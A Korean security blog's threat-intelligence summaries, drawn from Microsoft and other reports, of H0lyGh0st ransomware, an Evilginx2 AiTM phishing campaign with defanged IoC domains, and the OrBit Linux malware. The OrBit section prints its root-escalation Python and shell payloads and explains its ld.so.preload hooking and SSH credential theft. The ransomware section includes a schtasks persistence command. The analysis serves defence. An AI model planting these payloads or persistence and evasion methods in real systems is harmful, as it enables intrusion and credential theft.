cyPark

(22.07.25)

(22.07.22)

(22.07.20)

H0lyGh0st 랜섬웨어로 중소기업을 노리는 북한의 위협 행위자(22.07.18)

1.개요

MSTIC(Microsoft Threat Intelligence Center)가 DEV-0530으로 추적하는 북한 출신 행위자 그룹은 2021년 6월부터 랜섬웨어를 개발하고 공격에 사용하고 있습니다. H0lyGh0st라고 자칭하는 이 그룹은 2021년 9월부터 여러 국가의 소규모 비즈니스를 성공적으로 손상시켰습니다.

H0lyGh0st 페이로드와 함께 DEV-0530은 그룹이 피해자와 상호 작용하는 데 사용하는 .onion 사이트를 유지 관리합니다. 이 그룹의 표준 방법은 대상 장치의 모든 파일을 암호화하고 파일 확장자 .h0lyenc를 사용하여 피해자에게 증거로 파일 샘플을 보낸 다음 파일에 대한 액세스를 복원하는 대가로 비트코인으로 지불을 요구하는 것입니다. 그들은 갈취 전술의 일환으로 피해자 데이터를 소셜 미디어에 게시하거나 피해자의 고객이 지불을 거부할 경우 데이터를 보내겠다고 위협하기도 합니다. 

MSTIC은 DEV-0530이 PLUTONIUM으로 추적되는 다른 북한 기반 그룹(DarkSeoul 또는 Andariel)과 연결되어 있다고 평가합니다. 캠페인에서 H0lyGh0st 랜섬웨어를 사용하는 것은 DEV-0530에 고유한 반면 MSTIC은 PLUTONIUM에서 독점적으로 만든 도구를 사용하는 DEV-0530뿐만 아니라 두 그룹 간의 통신을 관찰했습니다.

DEV-0530은 주로 재무 목표를 추구하기 위해 랜섬웨어 캠페인을 운영합니다. MSTIC의 초기 캠페인 조사에서 분석가들은 그룹의 몸값 메모에 .onion 사이트 hxxp://matmq3z3hiovia3voe2tix2x54sghc3tszj74xgdy4tqtypoycszqzqd[.]onion에 대한 링크가 포함되어 있음을 관찰했습니다. 그들은 또한 피해자들에게 자신의 보안 태세에 대해 더 많이 알려 피해자의 보안 인식을 높인다고 주장함으로써 자신의 행동을 정당화하려고 시도합니다.

다른 많은 랜섬웨어 공격자들과 마찬가지로 DEV-0530은 웹사이트의 개인정보 보호정책에 돈을 받는 경우 피해자의 데이터를 판매하거나 게시하지 않을 것이라고 명시합니다. 그러나 피해자가 지불하지 않으면 모든 것을 공개할 것입니다. 피해자가 공격자와 연락할 수 있는 연락처 양식도 제공됩니다.

MSTIC은 알려진 PLUTONIUM 공격자 계정과 통신하는 알려진 DEV-0530 이메일 계정을 관찰했습니다. MSTIC는 또한 두 그룹이 동일한 인프라 세트에서 작동하고 유사한 이름을 가진 사용자 지정 맬웨어 컨트롤러를 사용하는 것을 관찰했습니다.

DEV-0530 작업의 기원을 추가로 평가하기 위해 MSTIC는 그룹에서 관찰된 활동에 대한 시간적 분석을 수행했습니다. MSTIC은 DEV-0530 활동의 수명 패턴이 UTC+8 및 UTC+9 시간대와 가장 일치한다고 추정합니다. UTC+9는 북한에서 사용되는 시간대입니다.

북한 문제에 대한 글로벌 전문가들의 지정학적 관찰과 정황 관찰을 바탕으로 마이크로소프트 분석가들은 북한에 기반을 둔 행위자들이 랜섬웨어를 사용하는 동기가 두 가지 가능성이 있다고 평가합니다.

첫 번째 가능성은 북한 정부가 이 활동을 후원한다는 점이다. 2016년부터 약해진 북한 경제는 제재, 자연재해, 가뭄, 2020년 초부터 북한 정부의 코로나19 외부세계 봉쇄 등으로 인해 더욱 약해졌다. 이러한 경제적 차질로 인한 손실을 상쇄하기 위해 북한 정부는 5년 이상 은행과 암호화폐 지갑에서 훔치는 사이버 범죄자를 후원했습니다. 북한 정부가 이러한 랜섬웨어 공격을 지시한다면, 이 공격은 재정적 손실을 상쇄하기 위해 정부가 가능하게 한 또 다른 전술이 될 것입니다.

그러나 암호화폐 조직에 대한 국가 후원 활동은 일반적으로 DEV-0530 피해학에서 관찰된 것보다 훨씬 광범위한 피해자를 대상으로 했습니다. 이 때문에 북한 정부가 이러한 랜섬웨어 공격을 활성화하거나 지원하지 않을 가능성도 있습니다. PLUTONIUM 인프라 및 도구와 관련된 개인은 개인적인 이익을 위해 달빛을 받을 수 있습니다. 이 달빛 이론은 DEV-0530의 표적이 되는 희생자를 종종 무작위로 선택하는 것을 설명할 수 있습니다.

2021년 6월과 2022년 5월 사이에 MSTIC은 H0lyGh0st 랜섬웨어를 SiennaPurple 및 SiennaBlue라는 두 가지 새로운 악성코드 제품군으로 분류했습니다. 둘 다 캠페인에서 DEV-0530에 의해 개발되고 사용되었습니다. MSTIC은 이 제품군에서 4가지 변종(BTLC_C.exe, HolyRS.exe, HolyLock.exe 및 BLTC.exe)을 식별하고 코드 유사성, C2 URL 패턴을 포함한 C2 인프라 및 랜섬 노트 텍스트를 기반으로 클러스터링했습니다. BTLC_C.exe는 C++로 작성되어 SiennaPurple로 분류되고 나머지는 Go로 작성되며 모든 변종은 Windows 시스템을 대상으로 .exe로 컴파일됩니다. Windows 10 및 11에 내장되어 제공되는 Microsoft Defender Antivirus는 BTLC_C.exe를 SiennaPurple로, 나머지는 SiennaBlue로 감지 및 차단하여 H0lyGh0st 악성코드의 알려진 모든 변종으로부터 Windows 사용자를 보호합니다.

BLTC_C.exe는 DEV-0530에서 개발한 휴대용 랜섬웨어로 2021년 6월에 처음 나타났습니다. 이 랜섬웨어는 SiennaBlue 제품군의 모든 멀웨어 변종에 비해 기능이 많지 않습니다. 분명히, BLTC_C.exe 악성코드는 관리자로 실행되지 않은 경우 종료하기 전에 다음과 같은 하드코딩된 오류를 표시합니다.

악성코드는 문자열 "aic^ef^bi^abc0"이 193[.]56[.]29[.]123으로 디코딩되도록 각 문자의 16진수 값에서 0x30을 빼는 문자열에 대해 간단한 난독화 방법을 사용합니다. BLTC_C.exe 랜섬웨어에서 디코딩된 침해 지표(IOC)는 C2 인프라 및 HTTP 비콘 URL 구조 access.php?order=AccessRequest&cmn을 포함하여 SiennaBlue 제품군의 모든 맬웨어 변종과 일치합니다. MSTIC에서 분석한 BTLC_C.exe 샘플의 PDB 경로는 M:\ForOP\attack(utils)\attack tools\Backdoor\powershell\btlc_C\Release\btlc_C.pdb입니다.

2021년 10월과 2022년 5월 사이에 MSTIC은 Go로 작성된 새로운 DEV-0530 랜섬웨어 변종 클러스터를 관찰했습니다. 이러한 변종을 SiennaBlue로 분류했습니다. 새로운 Go 기능이 시간이 지남에 따라 다양한 변종에 추가되었지만 SiennaBlue 제품군의 모든 랜섬웨어는 동일한 핵심 Go 기능을 공유합니다.

SiennaBlue 랜섬웨어에 사용된 Go 기능을 자세히 살펴보면 시간이 지남에 따라 핵심 기능이 다양한 암호화 옵션, 문자열 난독화, 공개 키 관리, 인터넷 및 인트라넷 지원과 같은 기능을 포함하도록 확장되었음을 알 수 있습니다. 아래 표는 HolyRS.exe와 BTLC.exe의 Go 기능을 비교하여 이 확장을 보여줍니다.

MSTIC는 DEV-0530이 2021년 11월 HolyRS.exe를 사용하여 여러 국가에서 여러 대상을 성공적으로 손상시켰다고 평가합니다. 피해자를 검토한 결과 피해자는 주로 제조 조직, 은행, 학교, 행사 및 회의 기획 회사를 포함한 중소기업인 것으로 나타났습니다. . 피해자학은 이러한 피해자들이 기회의 표적일 가능성이 가장 높다는 것을 나타냅니다. MSTIC는 DEV-0530이 대상 네트워크에 대한 초기 액세스 권한을 얻기 위해 공개 웹 애플리케이션 및 콘텐츠 관리 시스템에서 CVE-2022-26352(DotCMS 원격 코드 실행 취약점)와 같은 취약점을 악용했을 수 있다고 의심합니다. 그런 다음 SiennaBlue 멀웨어 변종을 삭제하고 실행했습니다. 현재까지 MSTIC은 DEV-0530이 공격에 제로데이 익스플로잇을 사용하는 것을 관찰하지 못했습니다.

네트워크 손상에 성공한 후 DEV-0530은 피해자 파일의 전체 복사본을 추출했습니다. 다음으로 공격자는 피해자 장치의 내용을 암호화하여 모든 파일 이름을 Base64로 인코딩된 파일 이름 버전으로 바꾸고 확장명을 .h0lyenc로 바꿉니다. 피해자는 C:\FOR_DECRYPT.html에서 몸값 메모와 다음과 같은 제목이 포함된 공격자가 보낸 이메일을 발견했습니다.

아래 스크린샷에서 볼 수 있듯이 공격자의 이메일은 피해자에게 그룹이 모든 파일을 훔치고 암호화했음을 알려줍니다. 이메일에는 파일 복구에 대한 지불 요구 외에도 주장을 증명하기 위해 도난당한 데이터 샘플에 대한 링크도 포함되어 있습니다.

BTLC.exe는 최신 DEV-0530 랜섬웨어 변종이며 2022년 4월부터 발견되었습니다. ServerBaseURL은 장치에서 액세스할 수 없습니다. BTLC.exe에 추가된 주목할만한 기능 중 하나는 맬웨어가 lockertask라는 예약된 작업을 생성하거나 삭제하는 지속성 메커니즘으로, 다음 명령줄 구문을 사용하여 랜섬웨어를 실행할 수 있습니다.

cmd.exe /Q /c schtasks /create /tn lockertask /tr [File] /sc minute /mo 1 /F /ru system 1> \\127.0.0.1\ADMIN$\__[randomnumber] 2>&1

랜섬웨어가 관리자 권한으로 성공적으로 실행되면 악성코드에 하드코딩된 기본 ServerBaseURL에 연결을 시도하고 공개 키를 C2 서버에 업로드하려고 시도하며 피해자의 드라이브에 있는 모든 파일을 암호화합니다.

우리의 조사에 따르면 공격자들은 피해자들에게 1.2~5개의 비트코인을 자주 요구했습니다. 그러나 공격자들은 일반적으로 기꺼이 협상했고, 어떤 경우에는 가격을 초기 요청 가격의 3분의 1 미만으로 낮췄습니다. 2022년 7월 초 현재 공격자의 지갑 거래를 검토한 결과 피해자로부터 몸값을 성공적으로 갈취하지 못한 것으로 나타났습니다.

2.공격 침해지표(IoC) 및 대응

3.출처

https://www.microsoft.com/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/

(22.07.15)

Microsoft 대규모 AiTM 피싱 공격 경고(22.07.13)

1.개요

AiTM(adversary-in-the-middle) 피싱 사이트를 사용하는 대규모 피싱 캠페인은 사용자가 MFA(다단계 인증)를 활성화한 경우에도 비밀번호를 훔치고 사용자 로그인 세션을 가로채고 인증 프로세스를 건너뛰었습니다. 그런 다음 공격자는 도난당한 자격 증명과 세션 쿠키를 사용하여 영향을 받는 사용자의 사서함에 액세스하고 다른 대상에 대한 후속 BEC(비즈니스 이메일 손상) 캠페인을 수행합니다. 위협 데이터를 기반으로 AiTM 피싱 캠페인은 2021년 9월부터 10,000개 이상의 조직을 대상으로 시도했습니다.

피싱은 공격자가 조직에 대한 초기 액세스 권한을 얻기 위해 사용하는 가장 일반적인 기술 중 하나로 남아 있습니다. 2021 Microsoft 디지털 방어 보고서에 따르면 2020년에 피싱 공격에 대한 보고가 두 배로 증가했으며 피싱은 위협 신호에서 관찰된 가장 일반적인 유형의 악성 이메일입니다. MFA는 자격 증명 도용에 대한 추가 보안 계층을 제공하며 특히 정부에서도 이를 의무화하는 국가 및 지역에서 더 많은 조직에서 이를 채택할 것으로 예상됩니다. 불행히도 공격자들은 이 보안 조치를 우회하는 새로운 방법도 찾고 있습니다.

AiTM 피싱에서 공격자는 대상 사용자와 사용자가 방문하려는 웹 사이트(즉, 공격자가 가장하려는 사이트) 사이에 프록시 서버를 배포합니다. 이러한 설정을 통해 공격자는 대상의 암호와 웹 사이트에서 진행 중인 인증된 세션을 증명하는 세션 쿠키를 훔치고 가로챌 수 있습니다. AiTM 피싱은 세션 쿠키를 훔치기 때문에 공격자는 사용자가 사용하는 로그인 방법에 관계없이 사용자를 대신해 세션에 대해 인증을 받습니다.

Microsoft 365 Defender는 AiTM 피싱 공격과 관련된 의심스러운 활동 및 세션 쿠키 절도 및 도난된 쿠키를 사용하여 Exchange Online에 로그인하려는 시도와 같은 후속 활동을 감지합니다. 그러나 유사한 공격으로부터 스스로를 더욱 보호하기 위해 조직은 사용자 또는 그룹 멤버십, IP 위치 정보 및 장치 상태와 같은 추가 ID 기반 신호를 사용하여 로그인 요청을 평가하는 조건부 액세스 정책으로 MFA를 보완하는 것도 고려해야 합니다.

AiTM 피싱 작동 방식

모든 최신 웹 서비스는 성공적인 인증 후 사용자와의 세션을 구현하므로 사용자가 방문하는 모든 새 페이지에서 인증을 받을 필요가 없습니다. 이 세션 기능은 초기 인증 후 인증 서비스에서 제공하는 세션 쿠키를 통해 구현됩니다. 세션 쿠키는 사용자가 인증되었으며 웹 사이트에서 진행 중인 세션이 있다는 웹 서버에 대한 증거입니다. AiTM 피싱에서 공격자는 전체 인증 프로세스를 건너뛰고 후자를 대신할 수 있도록 대상 사용자의 세션 쿠키를 얻으려고 시도합니다.

이를 위해 공격자는 피싱 사이트를 방문하는 사용자의 HTTP 패킷을 공격자가 가장하려는 대상 서버와 그 반대로 프록시하는 웹 서버를 배포합니다. 이렇게 하면 피싱 사이트가 원본 웹사이트와 시각적으로 동일합니다. 공격자는 또한 기존의 피싱 캠페인에서와 같이 자체 피싱 사이트를 만들 필요가 없습니다. URL은 피싱 사이트와 실제 사이트 간에 보이는 유일한 차이점입니다.

피싱 페이지에는 두 개의 서로 다른 TLS(전송 계층 보안) 세션이 있습니다. 하나는 대상과 다른 하나는 대상이 액세스하려는 실제 웹 사이트입니다. 이러한 세션은 피싱 페이지가 실제로 AiTM 에이전트 역할을 하여 전체 인증 프로세스를 가로채고 HTTP 요청에서 비밀번호, 더 중요하게는 세션 쿠키와 같은 중요한 데이터를 추출한다는 것을 의미합니다. 공격자가 세션 쿠키를 획득하면 대상의 MFA가 활성화된 경우에도 브라우저에 삽입하여 인증 프로세스를 건너뛸 수 있습니다.

AiTM 피싱 프로세스는 현재 오픈 소스 피싱 툴킷 및 기타 온라인 리소스를 사용하여 자동화할 수 있습니다. 널리 사용되는 키트에는 Evilginx2, Modlishka 및 Muraena가 있습니다.

AiTM 피싱 캠페인 추적

Microsoft 365 Defender 위협 데이터를 사용하여 2021년 9월 이후로 10,000개 이상의 조직을 대상으로 시도한 AiTM 피싱 캠페인의 여러 반복을 감지했습니다. 이러한 실행은 함께 연결된 것으로 보이며 Office 온라인 인증 페이지를 스푸핑하여 Office 365 사용자를 대상으로 합니다.

분석에 따르면 이러한 캠페인 반복은 Evilginx2 피싱 키트를 AiTM 인프라로 사용합니다. 우리는 또한 표적 우편함의 민감한 데이터 열거 및 지불 사기를 포함하여 침해 후 활동에서 유사성을 발견했습니다.

우리가 관찰한 실행 중 하나에서 공격자는 HTML 파일이 첨부된 이메일을 다른 조직의 여러 수신자에게 보냈습니다. 전자 메일 메시지는 대상 수신자에게 음성 메시지가 있음을 알렸습니다.

수신자가 첨부된 HTML 파일을 열면 사용자의 브라우저에 로드되어 음성 메시지가 다운로드 중임을 알리는 페이지가 표시되었습니다. 그러나 다운로드 진행률 표시줄이 HTML 파일에 하드코딩되어 있으므로 MP3 파일을 가져오지 못했습니다. 대신 페이지가 사용자를 리디렉터 사이트로 리디렉션했습니다.

이 리디렉터는 대상 사용자가 원래 HTML 첨부 파일에서 오는지 확인하는 게이트키퍼 역할을 했습니다. 이를 위해 먼저 URL에 예상되는 조각 값(이 경우 Base64로 인코딩된 사용자의 이메일 주소)이 있는지 확인했습니다. 해당 값이 존재하는 경우 이 페이지는 피싱 사이트의 랜딩 페이지에 있는 값을 연결했으며 이 값도 Base64로 인코딩되어 "링크" 변수에 저장됩니다.

두 값을 결합하여 후속 피싱 랜딩 페이지는 자동으로 로그인 페이지를 사용자의 이메일 주소로 채워서 소셜 엔지니어링 미끼를 강화했습니다. 이 기술은 기존의 피싱 방지 솔루션이 피싱 URL에 직접 액세스하는 것을 방지하기 위한 캠페인의 시도이기도 했습니다.

다른 인스턴스에서 리디렉터 페이지가 다음 URL 형식을 사용하는 것을 관찰했습니다.

hxxp://[username].[wildcard domain].[tld]/#[user email encoded in Base64]

리디렉션 후 사용자는 마침내 사용자 이름을 조각 값으로 사용하여 Evilginx2 피싱 사이트에 도착했습니다.

hxxp://login[.]nmmnvvx[.]xyz/yamRSmFG#[username]@[organizationname].[tld]

대상이 자격 증명을 입력하고 인증을 받으면 합법적인 office.com 페이지로 리디렉션됩니다. 그러나 백그라운드에서 공격자는 해당 자격 증명을 가로채 사용자를 대신하여 인증을 받았습니다. 이를 통해 공격자는 조직 내에서 후속 공격행위를 수행할 수 있습니다.

공격자가 사기 대상을 속여 공격자가 소유한 계정으로 지불금을 이체하도록 하는 체계입니다. 손상된 계정의 사서함에서 진행 중인 금융 관련 이메일 스레드를 가로채서 회신하고 사기 대상이 가짜 인보이스를 통해 돈을 보내도록 유인함으로써 달성할 수 있습니다.

AiTM 피싱 및 BEC 방어

이 AiTM 피싱 캠페인은 조직이 잠재적 공격으로부터 스스로를 방어하기 위해 마련한 보안 조치 및 정책에 대응하여 위협이 계속해서 진화하는 방식의 또 다른 예입니다. 자격 증명 피싱은 작년에 가장 피해가 큰 많은 공격에 활용되었기 때문에 유사한 시도가 규모와 정교함 면에서 성장할 것으로 예상합니다.

AiTM 피싱이 MFA를 우회하려고 시도하는 동안 MFA 구현은 여전히 ID 보안의 필수 기둥이라는 점을 강조하는 것이 중요합니다. MFA는 여전히 다양한 위협을 차단하는 데 매우 효과적입니다. AiTM 피싱이 처음 등장한 이유는 바로 그 효율성 때문입니다. 따라서 조직은 FIDO(Fast ID Online) v2.0 및 인증서 기반 인증을 지원하는 솔루션을 사용하여 MFA 구현을 "피싱 방지"로 만들 수 있습니다.

방어자는 또한 다음 솔루션과 모범 사례로 MFA를 보완하여 이러한 유형의 공격으로부터 조직을 더욱 보호할 수 있습니다.

2.공격 침해지표(IoC) 및 대응

redirector domains

• 32sssaawervvvv[.]we
• adminmmi[.]we
• auth2022[.]live
• cleanifl[.]com
• docpmsi[.]us
• vrtlsrvmapp[.]us
• vrtofcvm[.]live

Phishing site domains  

• login[.]actionspsort[.]cam
• login[.]akasmisoft[.]xyz
• login[.]aueuth11[.]live
• login[.]auth009[.]xyz
• login[.]auth2022[.]live
• login[.]auth83kl[.]live
• login[.]bittermann-hh[.]co
• login[.]cbhbanlc[.]com
• login[.]cleanifl[.]com
• login[.]clfonl365[.]xyz
• login[.]gddss36[.]live
• login[.]grodno-pl[.]com
• login[.]hfs923[.]shop
• login [.] karlandpearson [.] com
• login[.]klm2136[.]click
• login[.]login-micro[.]mcrsfts-passwdupdate[.]com
• login [.] mcrosfts-updated [.] live
• login[.]mcrosfts-update[.]cloud
• login[.]mcrosfts-update[.]digital
• login[.]mcrosftts-update[.]cloud
• login[.]mcrsft-audio[.]xyz
• login[.]mcrsfts-cloud[.]live
• login[.]mcrsfts-passwd[.]cloud
• login[.]mcrsfts-passwd[.]digital
• login[.]mcrsfts-passwdupdate[.]com
• login[.]mcrsfts-update[.]cloud
• login[.]mcrsfts-update[.]digital
• login[.]mcrsfts-virtualofficevm[.]com
• login[.]mcrsftsvm-app[.]digital
• login[.]mcrsftsvm-app[.]live
• login[.]mcrsfts-voiceapp[.]digital
• login[.]mcrsftsvoice-mail[.]cloud
• login[.]microsecurity[.]us
• login[.]microstoff[.]xyz
• login[.]mljs365[.]xyz
• login[.]mwhhncndn[.]xyz
• login[.]mycrsfts-passwd[.]live
• login[.]qwwxthn[.]xyz
• login[.]seafoodsconnection[.]com
• login[.]sunmarks[.]co[.]uk
• login[.]tfosorcimonline[.]xyz
• login[.]whitmanlab[.]uk
• login[.]yi087011[.]xyz

3.출처

https://www.microsoft.com/security/blog/2022/07/12/from-cookie-theft-to-bec-attackers-use-aitm-phishing-sites-as-entry-point-to-further-financial-fraud/

(22.07.11)

OrBit 악성 코드, 새로운 유형의 Linux 장치에서 데이터 탈취하는 멀웨어(22.07.08)

1.개요

The OrBit Dropper

해당 드로퍼는 페이로드를 설치하고 맬웨어 실행을 위한 환경을 준비합니다. 멀웨어는 휘발성 모듈 또는 지속성 기능으로 설치할 수 있습니다. 명령줄 인수를 수신하고 이를 기반으로 페이로드를 위치 중 하나로 추출합니다. 명령줄 인수를 사용하여 설치 경로를 바꿀 수 있고 페이로드의 내용을 업데이트하거나 완전히 제거할 수 있습니다.

페이로드를 설치하고 동적 링커에 의해 로드되는 공유 라이브러리에 추가하기 위해 드로퍼는 patch_ld라는 함수를 호출합니다. 먼저 동적 링커 /lib64/ld-linux-x86-64.so.2의 심볼릭 링크를 읽고 악성코드가 사용하는 경로를 검색하여 악성 페이로드가 이미 로드되었는지 확인합니다. 페이로드가 확인되면 다른 위치로 변경시킼고, 페이로드 확인되지 않을 시 /etc/ld.so.preload를 찾아 악성 라이브러리의 위치에 대한 심볼릭 링크(/lib/libntpVnQE6mk/.l 또는 /dev/shm/ldx/.l)로 바꿉니다. 마지막으로 악성 라이브러리가 먼저 로드되도록 임시 파일 끝에 /etc/ld.so.preload를 추가합니다.

악성 라이브러리를 동적 링커에 로드하기 전에 드롭퍼는 ​​합법적인 동적 링커의 복사본을 MALWARE_FOLDER/.backup_ld.so에 저장하여 필요한 경우 환경을 복원하고 합법적인 데이터를 사용하여 멀웨어를 숨길 수 있도록 합니다.

환경 준비는 고유 그룹 ID(GID)를 맬웨어가 사용하는 경로로 설정하여 수행됩니다. 샘플에서 값은 0xE0B2E이며 페이로드에서 동일한 GID가 사용됩니다. 또한 드로퍼는 파이썬(/usr/bin/python에서)을 다음으로 복사합니다.

MALWARE_FOLDER 및 맬웨어에서 사용할 추가 파일 4개 생성됩니다.

/lib/libntpVnQE6mk/.logpam
/lib/libntpVnQE6mk/sshpass.txt
/lib/libntpVnQE6mk/sshpass2.txt
/lib/libntpVnQE6mk/.ports

그리고 위협 행위자에게 원격 액세스 권한을 부여하기 위해 다음 2개의 파일을 작성합니다.

아래 페이로드는 MALWARE_FOLDER/bin/escalator에 저장됩니다.

import os
os.setreuid(0,0)
os.execv("/bin/bash", ("/bin/bash", "-i"))

아래 페이로드는 MALWARE_FOLDER/.profile에 저장됩니다.

#!/bin/bash
if [ "$(id -u)" -ne 0 ] ; then
   echo "Welcome to $(hostname). You are GID $(id -g), UID $(id -u) and about to be escalated to UID 0."
   exec ~/bin/python ~/bin/escalator
fi

The OrBit Payload

페이로드는 영구 저장소(예: /lib/libntpVnQE6mk/ 또는 /dev/shm/ldx/) 아래의 shim-memory에 배치할 수 있는 공유 개체(.SO 파일)입니다.

공유 객체 후크는 3가지 라이브러리(libc, libcap 및 PAM(Pluggable Authentication Module))에서 기능합니다. 이러한 기능을 사용하는 기존 프로세스는 본질적으로 수정된 기능을 사용하고 새로운 프로세스도 악성 라이브러리와 연결되어 악성 프로그램이 전체 시스템을 감염시키고 자격 증명을 수집하고 탐지를 회피하고 지속성을 확보하고 공격자에게 원격 액세스를 제공할 수 있습니다.

libc 함수의 후킹을 구현할 때 아래 스크린샷에서 볼 수 있듯이 먼저 해당 시스템 호출 번호로 syscall을 호출합니다. 문자열은 하드코딩된 키로 간단한 XOR로 난독화됩니다.

맬웨어의 기능 중 하나는 시스템에서 원격 연결을 설정하는 것이며 플러그형 인증 모듈 라이브러리에 있는 3가지 기능인 pam_open_session, pam_authenticate 및 pam_acct_mgmt를 연결합니다. 이러한 기능을 연결함으로써 멀웨어는 SSH 연결에서 정보를 훔치고 공격자에게 원격 액세스를 제공하고 네트워크 활동을 숨길 수 있습니다.

후크된 pam_authenticate가 호출되면 사용자 이름과 비밀번호가 하드코딩된 값과 같은지 확인하고, 그렇다면 연결에 사용된 포트를 /lib/libntpVnQE6mk/.ports에 기록하고 SSH 연결을 엽니다. 다른 경우에는 파일이 /lib/libntpVnQE6mk/.logpam이 존재하며(우리가 분석한 샘플에서는 드로퍼에 의해 생성됨) 존재하는 경우 자격 증명을 /lib/libntpVnQE6mk/sshpass.txt 파일에 기록합니다. 기본적으로 첫 번째 파일은 플래그 역할을 합니다.

OrBit의 회피 기술

탐지를 피하기 위해 맬웨어는 여러 기능을 연결하여 실행 중인 프로세스 또는 맬웨어에서 사용 중인 파일에 악성 공유 라이브러리의 존재를 나타낼 수 있는 정보를 출력하지 못하도록 합니다. 맬웨어는 하드코딩된 GID 값(드로퍼에서 설정한 값)을 사용하여 맬웨어와 관련된 파일 및 프로세스를 식별하고 이를 기반으로 후크 기능의 동작을 조작합니다. 예를 들어 readdir은 호출 프로세스의 GID를 확인하기 위해 연결되며, 하드코딩된 값과 일치하지 않으면 사전 정의된 GID 값을 가진 모든 디렉토리가 함수의 출력에서 생략됩니다.

악성코드 상세분석

악성코드는 fopen, open, open64, openat 등 파일을 여는 함수를 후크하여 해당 open 함수에 제공된 파일이 proc 파일 시스템의 일부인지 확인합니다. 확인 중인 경로 중 하나는 /proc/net/tcp이며 백도어에 의해 생성된 네트워크 트래픽을 공개할 수 있습니다. 멀웨어가 이 파일의 출력을 처리하는 방식은 열려 있는 다른 파일과 유사하며 Symbiote의 구현과 유사합니다. hooked 함수는 파일의 내용을 읽고 한 번에 한 줄씩 악성코드가 사용하는 포트와 주소에 대한 정보를 담고 있는 MALWARE_FOLDER/.ports의 내용과 비교합니다. 악성코드는 임시 파일을 생성하고 악성코드를 노출시키지 않는 라인만 작성합니다. 파일이 진행되면 멀웨어는 호출자에게 임시 파일에 대한 파일 설명자를 반환합니다.

다음 파일 경로는 현재 매핑된 메모리 영역과 해당 액세스 권한을 보여줍니다.

• /proc/%PID%/maps
• /proc/%PID%/smaps 
• /proc/%PID%/numa_maps

프로세스가 이러한 파일 중 하나에 액세스하면 공유 라이브러리가 공개될 수 있으므로 후크 열기 기능은 위에서 설명한 것과 유사한 방식으로 출력에 멀웨어가 사용하는 디렉토리 경로가 포함되어 있지 않은지 확인합니다.

검사 중인 proc 파일 시스템의 다른 파일은 /proc/loadavg입니다. 이 파일은 가동 시간과 같은 유틸리티에서 사용되며 CPU 사용량 및 현재 실행 중인 프로세스의 상태에 대한 정보를 제공합니다. 멀웨어는 이 파일의 정보를 이전 파일과 유사한 방식으로 처리합니다.

멀웨어 후크는 특정 유틸리티의 탐지를 회피하고, 프로세스의 동작을 제어하고, 새로운 프로세스를 감염시켜 지속성을 유지하기 위해 실행됩니다. 후킹 로직은 프로세스 이름과 경로를 확인하고 이를 /bin, /usr 및 /sbin의 다른 usulite와 비교합니다.

후킹된 execve 기능은 악성코드가 네트워크 활동을 숨기는 데 사용하며, 악성코드는 새 프로세스가 ip 또는 iptables 유틸리티인지 확인합니다(/usr/sbin 및 /sbin 모두 확인) 먼저 명령을 실행하고 출력을 파이프합니다 레코드를 검사하고 MALWARE_FOLDER/.net 또는 MALWARE_FOLDER/.fw에 저장된 정보와 레코드 간에 일치하는 항목이 있는지 확인하는 로컬 버퍼로 이동합니다. 이 레코드는 명령의 출력에서 ​​생략됩니다.

execve가 dmesg와 함께 호출되면 MALWARE_FOLDER/.sys/.dmesg의 레코드와 동일한 레코드와 zapping, tcpdump, promiscuous, libntpVnQE6mk, libdl.so 키워드 중 하나가 포함된 레코드를 맬웨어가 생략합니다.

execve는 환경 변수 LD_TRACE_LOADED_OBJECTS로 함수가 호출되었는지 확인합니다. 이 변수가 설정되면 프로그램이 동적 종속성. 멀웨어는 원래의(패치되지 않은) 동적 링커를 백업 파일에 저장하므로 이 변수로 execve가 호출되면 표시될 출력은 합법적인 동적 링커가 호출된 것처럼 보이고 악성 라이브러리를 나열하지 않습니다.

Strace는 hooked execve가 검사하는 또 다른 유틸리티입니다. strace의 출력은 추적된 프로세스에 의해 로드되는 라이브러리 중 하나로 악성 라이브러리를 드러낼 수 있기 때문입니다. 출력이 파이프될 파일 경로를 지정하는 -o 플래그를 사용하여 strace를 실행할 수 있습니다. 명령에 설정되어 있지 않으면 멀웨어가 strace의 출력을 /tmp/.orbit에 기록할 것입니다. 다른 유틸리티와 마찬가지로 맬웨어는 명령을 실행하고 출력 파일에서 결과를 가져옵니다. 다음으로 악성 라이브러리(MALWARE_FOLDER/.l), 악성 코드가 사용하는 GID(920366) 및 해당 폴더 경로 중 하나의 심볼릭 링크가 포함된 레코드를 생략합니다.

멀웨어는 지속성을 달성하기 위해 두 가지 방법을 사용합니다. 멀웨어가 두 가지 방법을 모두 사용하는 이유는 실행되는 동안 감염된 시스템에서 멀웨어를 제거하기 어렵게 만들기 때문입니다. 첫 번째 방법은 멀웨어 경로를 /etc/ld.so.preload 구성 파일에 추가하는 것입니다. 이것은 로더에게 악성 코드가 모든 새 프로세스에 대해 먼저 로드되어야 함을 지시합니다. 예를 들어 감염된 시스템에서 구성 파일을 제거하여 이 방법을 방지할 수 있는 경우 맬웨어는 로더 바이너리를 패치하는 두 번째 방법을 사용합니다.

맬웨어는 먼저 로더의 바이너리 복사본을 만들어 패치할 수 있습니다. 바이너리에서 "/etc/ld.so.preload" 문자열에 대한 간단한 검색을 수행합니다. 발견되면 문자열을 %MALWARE_FOLDER% 내의 파일 경로로 바꿉니다. 이 파일의 내용에는 ld.so.preload 구성 파일로 작동하는 맬웨어 라이브러리에 대한 경로가 있습니다. 즉, 패치 로더가 실행될 때 "/etc" 대신 %MALWARE_FOLDER%에 있는 파일을 사용합니다. 맬웨어 작성자는 이 두 가지 방법 중 하나가 사라지는 경우 캐치로 작동하도록 설정했습니다. 예를 들어, 관리자가 "/etc" 아래의 구성 파일을 제거하여 악성코드가 로드되는 것을 막고자 하면 숨겨진 파일이 드러날 수 있습니다. 이 파일을 사용하지 않는 패치된 로더는 구성 파일을 다시 만듭니다. 관리자가 패치된 로더를 클린 버전으로 덮어쓰면 클린 로더는 로더를 다시 패치하는 "ld.so.preload" 구성 파일에서 멀웨어를 로드합니다.

